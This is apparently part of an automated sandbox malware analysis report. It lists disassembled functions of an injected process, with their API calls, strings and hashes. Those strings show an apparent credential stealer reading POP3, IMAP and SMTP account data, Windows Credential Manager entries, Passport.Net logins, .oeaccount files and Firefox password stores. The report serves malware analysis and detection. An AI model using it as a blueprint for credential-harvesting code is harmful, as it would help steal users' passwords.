                      • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                      • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                    • memcpy.MSVCRT ref: 00449846
                    • memcpy.MSVCRT ref: 00449887
                    • memcpy.MSVCRT ref: 004498B8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: gj
                    • API String ID: 438689982-4203073231
                    • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                    • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                    • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                    • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                    Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: __aulldvrm$__aullrem
                    • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                    • API String ID: 643879872-978417875
                    • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                    • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                    • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                    • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                    Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00405827
                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                    • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                    • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                    • memset.MSVCRT ref: 004058C3
                    • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                    • SetFocus.USER32(?), ref: 00405976
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$FocusItemmemset
                    • String ID:
                    • API String ID: 4281309102-0
                    • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                    • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                    • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                    • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                    Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                    • _mbscat.MSVCRT ref: 0040A8FF
                    • sprintf.MSVCRT ref: 0040A921
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileWrite_mbscatsprintfstrlen
                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                    • API String ID: 1631269929-4153097237
                    • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                    • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                    • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                    • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                    Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040810E
                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,75A8EB20,?), ref: 004081B9
                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                      • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                    • String ID: POP3_credentials$POP3_host$POP3_name
                    • API String ID: 524865279-2190619648
                    • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                    • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                    • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                    • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                    Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ItemMenu$CountInfomemsetstrchr
                    • String ID: 0$6
                    • API String ID: 2300387033-3849865405
                    • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                    • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                    • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                    • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                    Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpystrlen$memsetsprintf
                    • String ID: %s (%s)
                    • API String ID: 3756086014-1363028141
                    • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                    • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                    • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                    • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                    Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscat$memsetsprintf
                    • String ID: %2.2X
                    • API String ID: 125969286-791839006
                    • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                    • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                    • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                    • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                    Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                    • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                    • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                      • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                      • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                      • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                      • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                      • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                      • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                      • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                    • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                    • CloseHandle.KERNEL32(?), ref: 00444206
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                    • String ID: ACD
                    • API String ID: 1886237854-620537770
                    • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                    • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                    • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                    • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                    Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004091EC
                    • sprintf.MSVCRT ref: 00409201
                      • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                      • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                      • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                    • SetWindowTextA.USER32(?,?), ref: 00409228
                    • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                    • String ID: caption$dialog_%d
                    • API String ID: 2923679083-4161923789
                    • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                    • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                    • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                    • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                    Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                    Download Yara Rule
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                    • memset.MSVCRT ref: 00410246
                    • memset.MSVCRT ref: 00410258
                      • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                    • memset.MSVCRT ref: 0041033F
                    • _mbscpy.MSVCRT ref: 00410364
                    • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                    • String ID:
                    • API String ID: 3974772901-0
                    • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                    • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                    • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                    • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                    Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                    Download Yara Rule
                    APIs
                    • wcslen.MSVCRT ref: 0044406C
                    • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                    • strlen.MSVCRT ref: 004440D1
                      • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                      • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                    • memcpy.MSVCRT ref: 004440EB
                    • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                    • String ID:
                    • API String ID: 577244452-0
                    • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                    • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                    • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                    • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                    Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                      • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                    • _strcmpi.MSVCRT ref: 00404518
                    • _strcmpi.MSVCRT ref: 00404536
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _strcmpi$memcpystrlen
                    • String ID: imap$pop3$smtp
                    • API String ID: 2025310588-821077329
                    • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                    • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                    • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                    • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                    Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040C02D
                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                      • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                      • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                      • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                      • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                      • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                      • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                    • API String ID: 2726666094-3614832568
                    • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                    • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                    • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                    • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                    Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                    • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                    • OpenClipboard.USER32(?), ref: 0040C1B1
                    • GetLastError.KERNEL32 ref: 0040C1CA
                    • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                    • String ID:
                    • API String ID: 2014771361-0
                    • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                    • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                    • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                    • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                    Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                    Download Yara Rule
                    APIs
                    • memcmp.MSVCRT ref: 00406151
                      • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                      • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                      • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                    • memcmp.MSVCRT ref: 0040617C
                    • memcmp.MSVCRT ref: 004061A4
                    • memcpy.MSVCRT ref: 004061C1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmp$memcpy
                    • String ID: global-salt$password-check
                    • API String ID: 231171946-3927197501
                    • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                    • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                    • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                    • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                    Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                    • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                    • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                    • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                    Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                    Download Yara Rule
                    APIs
                    • GetClientRect.USER32(?,?), ref: 004016A3
                    • GetSystemMetrics.USER32(00000015), ref: 004016B1
                    • GetSystemMetrics.USER32(00000014), ref: 004016BD
                    • BeginPaint.USER32(?,?), ref: 004016D7
                    • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                    • EndPaint.USER32(?,?), ref: 004016F3
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                    • String ID:
                    • API String ID: 19018683-0
                    • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                    • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                    • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                    • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                    Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040644F
                    • memcpy.MSVCRT ref: 00406462
                    • memcpy.MSVCRT ref: 00406475
                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                      • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                      • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                    • memcpy.MSVCRT ref: 004064B9
                    • memcpy.MSVCRT ref: 004064CC
                    • memcpy.MSVCRT ref: 004064F9
                    • memcpy.MSVCRT ref: 0040650E
                      • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID:
                    • API String ID: 438689982-0
                    • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                    • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                    • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                    • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                    Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                    • strlen.MSVCRT ref: 0040F7BE
                    • _mbscpy.MSVCRT ref: 0040F7CF
                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                    • String ID: Passport.Net\*
                    • API String ID: 2329438634-3671122194
                    • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                    • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                    • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                    • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                    Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                    • memset.MSVCRT ref: 0040330B
                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                    • strchr.MSVCRT ref: 0040335A
                      • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                    • strlen.MSVCRT ref: 0040339C
                      • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
